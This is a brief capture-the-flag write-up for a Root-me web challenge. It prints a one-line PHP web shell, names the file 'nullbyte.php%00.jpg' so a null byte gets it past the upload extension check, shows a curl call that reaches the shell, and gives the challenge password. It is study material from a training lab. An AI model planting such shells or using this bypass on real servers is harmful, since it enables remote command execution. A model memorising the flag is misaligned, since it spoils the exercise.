Root-me

File upload - null byte

Gallery v0.04

This time we’ll uploading a file and using a null byte to bypass the extension requirement.

We’ll use the same php code that we used before.

<?php if($_GET['cmd']) { system($_GET['cmd']); } ?>

This name we’ll name it nullbyte.php%00.jpg, the webpage will tell us the location of the file. The only thing left to do is to retrieve it and taking out the %00.jpg

curl http://challenge01.root-me.org/web-serveur/ch22/galerie/upload/randomstring/nullbyte.php

Well done ! You can validate this challenge with the password : YPNchi2NmTwygr2dgCCF
This file is already deleted.